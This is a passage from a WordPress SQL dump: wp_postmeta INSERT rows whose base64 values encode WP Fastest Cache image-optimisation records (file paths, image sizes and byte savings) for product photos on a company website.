wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzJTLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNTI2LCJ0aW1lIjoxNDgzNTY0ODA3LCJpZCI6MTc1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MlMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIyOTgsInRpbWUiOjE0ODM1NjQ4MTAsImlkIjoxNzU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDQxNywidGltZSI6MTQ4MzU2NDgxNSwiaWQiOjE3NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzJTLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjcsInRpbWUiOjE0ODM1NjQ4MTgsImlkIjoxNzU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ0LCJ0aW1lIjoxNDgzNTY0ODIxLCJpZCI6MTc1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MlMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUyMCwidGltZSI6MTQ4MzU2NDgyNSwiaWQiOjE3NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzJTLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDgyLCJ0aW1lIjoxNDgzNTY0ODI4LCJpZCI6MTc1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6Mzg4LCJ0aW1lIjoxNDgzNTY0ODMyLCJpZCI6MTc1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTE0LCJ0aW1lIjoxNDgzNTY0ODM1LCJpZCI6MTc1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTU2LCJ0aW1lIjoxNDgzNTY0ODM4LCJpZCI6MTc1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzQ5LCJ0aW1lIjoxNDgzNTY0ODQyLCJpZCI6MTc1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyUy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NSwidGltZSI6MTQ4MzU2NDg0NSwiaWQiOjE3NTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29242, 1756, 'wpfc_optimisation_reduction', '22149'); 
INSERT INTO `wp_postmeta` VALUES (29243, 1756, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDg1MCwiaWQiOiIxNzU2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MkMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc2NywidGltZSI6MTQ4MzU2NDg1MywiaWQiOjE3NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzJDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNjY0LCJ0aW1lIjoxNDgzNTY0ODU3LCJpZCI6MTc1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MkMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzNjgsInRpbWUiOjE0ODM1NjQ4NjAsImlkIjoxNzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDczMCwidGltZSI6MTQ4MzU2NDg2NCwiaWQiOjE3NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzJDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1NjQ4NjgsImlkIjoxNzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDU4LCJ0aW1lIjoxNDgzNTY0ODcxLCJpZCI6MTc1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MkMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUxOCwidGltZSI6MTQ4MzU2NDg3NCwiaWQiOjE3NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzJDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDcyLCJ0aW1lIjoxNDgzNTY0ODc4LCJpZCI6MTc1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6Mzc5LCJ0aW1lIjoxNDgzNTY0ODgxLCJpZCI6MTc1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTE1LCJ0aW1lIjoxNDgzNTY0ODg1LCJpZCI6MTc1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTYxLCJ0aW1lIjoxNDgzNTY0ODg4LCJpZCI6MTc1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODE3LCJ0aW1lIjoxNDgzNTY0ODkxLCJpZCI6MTc1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MkMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyQy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcyQy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NSwidGltZSI6MTQ4MzU2NDg5NSwiaWQiOjE3NTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29244, 1755, 'wpfc_optimisation_reduction', '26616'); 
INSERT INTO `wp_postmeta` VALUES (29245, 1755, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDg5OSwiaWQiOiIxNzU1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MFMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkzMSwidGltZSI6MTQ4MzU2NDkwMywiaWQiOjE3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzBTLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMDkyLCJ0aW1lIjoxNDgzNTY0OTA2LCJpZCI6MTc1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGV